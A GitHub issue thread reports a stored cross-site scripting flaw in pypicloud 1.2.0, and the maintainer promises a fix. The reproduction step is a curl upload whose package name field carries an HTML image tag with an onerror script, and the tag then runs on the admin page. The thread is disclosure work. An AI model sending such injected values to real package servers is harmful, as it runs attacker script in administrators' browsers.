### ISSUE TITLE
injection html code from package name results a sotred xss  

### ISSUE THREAD

**Issue by SoufElhabti** [stevearc/pypicloud#280]
vulnerable version: 1.2.0 
step to reproduce : 
1. install pypicloud using docker : ```docker run -it --rm -p 8080:8080 stevearc/pypicloud ```
2. from an user allowed to upload a package run this command ```curl -F ':action=file_upload' -F 'name=flywheel<img src=x onerror=alert(1)>' -F 'version=0.1.0' -F 'content=@./testpackage.gz' http://account:password@198.199.69.221:8080/simple/```
3. go to /#/admin and you will see the xss popped

**Comment by stevearc** [comment]
Thanks for the report! Fix incoming
